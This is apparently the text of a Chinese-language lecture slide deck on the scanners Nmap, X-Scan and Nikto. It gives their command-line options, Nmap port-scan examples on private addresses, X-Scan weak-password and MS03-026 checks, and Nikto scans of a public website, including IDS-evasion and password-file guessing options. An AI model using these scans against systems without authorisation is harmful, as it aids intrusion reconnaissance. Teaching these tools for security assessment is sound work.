nmap[scan Typy(s)][Option]{target specification} – “Scan Type(s)‖用于指定扫描类型, – “Options‖用于指定选项, – “target specification‖用于指定扫描目标 Nmap的功能和用法 —扫描类型参数 ? -sT 指定Nmap进行TCP connect()扫描 ? -sS 指定Nmap进行TCP SYN扫描 ? -sF、-sX、-sN 指定Nmap进行FIN、Xmas和Null 扫描 ? -sP 指定Nmap进行Ping扫描 ? -sU 指定Nmap进行UDP扫描 ? -sA 指定Nmap进行TCP ACK扫描 ? -sW 指定Nmap对滑动窗口进行扫描 ? -sR 指定Nmap进行RPC扫描 ? -b 指定Nmap进行FTP 反弹攻击 Nmap的功能和用法 —选项参数 ? -P0 ? -PT ? -PS ? -PI ? -PB ? -O 指定Nmap在扫描之前,不必Ping目标主机 指定Nmap在扫描之前,使用TCP确定哪些 主机正在运行 指定Nmap使用TCP SYN对目标主机进行扫 描 指定Nmap使用真正的Ping来扫描目标主机 是否正在运行,同时还可以对直接子网广播 地址进行观察 指定Nmap使用TCP ACK和ICMP echo请求 两种扫描类型并行扫描 指定Nmap对TCP/IP指纹特征的扫描 Nmap的功能和用法 —扫描目标参数 ? 扫描目标参数是必须给出的 ? 可以是单一主机,也可以是一个子网 – 128.210.*.* – 128.210.0-255.0-255 – 128.210.0.0/16 Nmap使用 ? 使用Nmap扫描指定网络中正在运行的主机 – 例1:使用Nmap的Ping扫描技术探测网络 192.168. 2.123中正在运行的主机 #nmap –sP 192.168.2.123 – 例2:使用TCP ACK技术来探测IP地址范围在 192.168.2.100至192.168.2.200中正在运行的主机 #nmap –sP –PT80 192.168.2.100-200 Nmap使用 ? 使用Nmap扫描目标主机上开放的TCP端口 ? 例1:使用Nmap的TCP connect()扫描技术扫描IP地址为 192.168.2.195的主机上1~1024之间开放的TCP端口,并显示详细 的信息 #nmap –v –sT –p 1-1024 192.168.2.195 ? 例2:使用Nmap的TCP SYN扫描技术扫描IP地址为192.168.2.195的 主机上开放的TCP端口,并显示详细的信息 #nmap –v –sS 192.168.2.195 ? 使用Nmap扫描UDP端口 例:使用Nmap扫描IP地址为192.168.2.195的主机上开放的UDP端口 #nmap –v –sU 192.168.2.195 基于Windows的Nmap ? 基于Windows的Nmap的参数及用法与基于 Linux的Nmap完全相同 ? Nmap在Windows平台上运行时,需要用到 WinPcap程序支持运行 Nmap对指定地址扫描 ? 对地址192.168.2.122扫描 Nmap对指定地址扫描 ? 地址192.168.2.122的端口扫描结果 Nmap对指定地址扫描 ? 地址为192.168.2.122的主机信息 Nmap优缺点 ? 优点

Nmap作为主动式端口扫描工具,只要在对方没有 把通信阻断的情况下,可以在较短的时间内获得结果 ? 缺点 (1)现在带有阻断功能的防火墙越来越多,有些防火墙当 检测到端口扫描时,会将端口关闭一定的时间,还有的机 器使用了很多filter功能,只对特定的IP地址提供服务,这 种情况下,主动式的正确性大打折扣。

(2)主动式只是在一瞬间对端口进行扫描,只有当服务器 那个时候使用的服务才有可能被侦测到。

(3)端口扫描是一种广义上的攻击行为,对于末经许可的 机器,一般不能施行。 X-Scan ? X-Scan简介 ? X-Scan的用法 ? X-Scan扫描示例 X-Scan简介 ? X-Scan是由安全焦点开发的完全免费的漏洞扫描软件, 采用多线程方式对指定IP地址或IP地址范围进行漏洞 扫描 ? 扫描内容包括: – – – – – – – 远程服务类型 操作系统类型及版本 各种弱口令漏洞 后门 应用服务漏洞 网络设备漏洞 拒绝服务漏洞等二十几个大类 X-Scan的用法 ? X-Scan的界面 X-Scan的用法 ? X-Scan的扫描参数界面 X-Scan的用法 ? X-Scan的扫描参数界面 X-Scan扫描示例 —localhost扫描 ? 对localhost的扫描(普通信息) X-Scan扫描示例 —localhost扫描 ? 对localhost的扫描(漏洞信息) X-Scan扫描示例 —指定地址段扫描 ? 对指定地址段(192.168.2.1-255)的扫描(普通信息) X-Scan扫描示例 —指定地址段扫描 ? 对指定地址段(192.168.2.1-255)的扫描(漏洞信息) X-Scan扫描示例 —指定地址段扫描 ? 地址192.168.2.116的开放服务和漏洞检查脚本显示 X-Scan扫描示例 —指定地址段扫描 ? 地址192.168.2.116漏洞检测脚本下的445/tcp端口 X-Scan扫描示例 —漏洞示例 ? 漏洞示例 – NT-Server弱口令漏洞 ? 如果目标主机的用户账户存在很容易被猜测出来的 弱口令,则X-Scan将能够扫描出来并标识为高风险 级别的“漏洞” X-Scan扫描示例 —漏洞示例(续) ? 漏洞示例 – “冲击波”漏洞 ? 通过X-Scan可以扫描出目标主机所存在的“冲击波” 蠕虫病毒所利用的漏洞(MS03-026/ KB823980) X-Scan扫描示例 —扫描报告 ? 扫描报告 X-Scan扫描示例 —检测报告 ? 对指定地址段扫描的检测报告 Nikto ? ? ? ? Nikto简介 Nikto运行 Nikto各参数项作用 Nikto应用 Nikto简介 ? Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页 服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件 /CGIs;超过625种服务器版本;超过230种特定服务器问题,包括 多种有潜在危险的文件、CGI及其他问题,它可以扫描指定主机的 WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主 机允许的http模式等等。扫描项和插件可以自动更新(如果需要)。

基于Whisker/libwhisker完成其底层功能(Libwhisker是一个Perla模 块,适合于HTTP测试。它可以针对许多已知的安全漏洞,测试 HTTP服务器,特别是检测危险CGI的存在。Whisker是一个使用 libwhisker的扫描程序)。

? Nikto最新版本为2.1.1版,官方下载网站

http://www.cirt.net/nikto2 Nikto简介(续) ? 到Nikto官方网站上下载最新版本nikto-current.tar.gz,此为 Linux下的压缩格式,在Windows下用WinRar解压即可,解压 后的文件有:nikto.conf、docs、nikto.pl、plugins、 templates。

如下图所示: Nikto运行 ? 将解压后的Nikto文件夹放到C盘根目录下。

? 下载ActivePerl的最新版本ActivePerl-5.10.1.1007MSWin32-x86-291969.msi,双击安装即可,如下图所示

? 点击“开始”->―运行”,输入CMD,输入cd \nikto 进入Nikto文件夹,在这个文件夹中可以运行Nikto,它 的一般格式为

nikto.pl -h 目标主机 -其它参数。

? 参数说明 ? 在CMD下输入:nikto.pl –H ? 显示Nikto和帮助信息。 Nikto各参数项作用 ? 在Nikto中部分参数使用全称或参数的第一个字母均可,如-config和-c是等同的,在下面各项中,使 用此写法:-c(config)的均表示此项参数用参数项全称或首字母均可。

? -c(config):使用指定的config文件来替代安装在本地的nikto.conf文件。

? -C(Cgidirs):扫描包含指定内容的CGI目录。所包含的内容在-C后面指定。如-C /cgi/。

? -D(Display):打开或关闭默认输出。输出选项

1 显示重定向 2 显示获取的cookies信息 3 显示所有200/OK的回应 4 显示请求认证的URLs D Debug输出 ? V 冗余输出 ? -dbcheck:检查数据库和其它重要文件的句法错误。

? -e(evasion):使用LibWhisker中对IDS的躲避技术,可使用以下几种类型

1 随机URL编码 (非UTF-8方式) 2 自选择路径(/./) 3 过早结束的URL 4 优先考虑长随机字符串 5 参数欺骗 6 使用TAB作为命令的分隔符 7 使用变化的URL Nikto各参数项作用(续) ? -f(findonly):只寻找HTTP或HTTPS端口,不进行完全扫描。

? -F(Format):指定检测报告输出文件的格式,默认是txt文件格式(可以是htm、csv、txt或 xml格式) ? -h(host):指定目标主机,可以是IP或域名。

? -H(Help):显示帮助信息。

? -i(id):用于主机鉴定,其格式为:userid:password ? -m(mutate):猜解更多的文件名

? 1 检测根目录下的所有文件 ? 2 猜测密码文件名 ? 3 通过Apache(/~user 请求类型)枚举用户名 ? 4 通过cgiwrap(/cgi-bin/cgiwrap/~user 请求类型)枚举用户名 ? -n(nolookup):不执行主机名查找。

? -o(output):输出到指定文件 ? -p(port):指定使用的端口,默认为80。

? -P(Pause):各项操作之间的延时时间。

? -r(root):对所有请求优先考虑root的值,格式为:/目录名 ? -s(ssl):强制在端口上使用ssl模式 ? -S(Single):实行对单个目标的请求模式。

? -t(timeout):超时时间,默认为2秒。 Nikto应用 (1)检测目标主机。输入如下命令

nikto.pl -h www.sans.org.cn ? 得到的结果如下图所示: 可以看到目标 主机和服务器 版本、根目录 下的robots.txt 文档信息、 CGI目录信息, 所允许的 HTTP方法选 项,文件头信 息等。 Nikto应用 (2)使用-p参数指定要扫描的端口,可以指定某一个端口,如-p 443, 可以指定一个端口范围,如-p 80-443,也可指定多个不连续端口,如下 图所示: Nikto应用 ? ③、如果运行Nikto的主机是通过HTTP proxy来访问互联网的,则可以使用代 理来扫描,使用选项-u,如:nikto.pl -h www.sans.org.cn -p 443 -u ? ④、检测目标主机,并将结果保到txt文件中:nikto.pl -h www.sans.org.cn -p 80 443 –o output.txt ? 结果如下图所示 谢 谢
漏洞》由(易啊教育网)整理提供,版权归原作者、原出处所有。
Copyright © 易啊教育网 All Rights Reserved.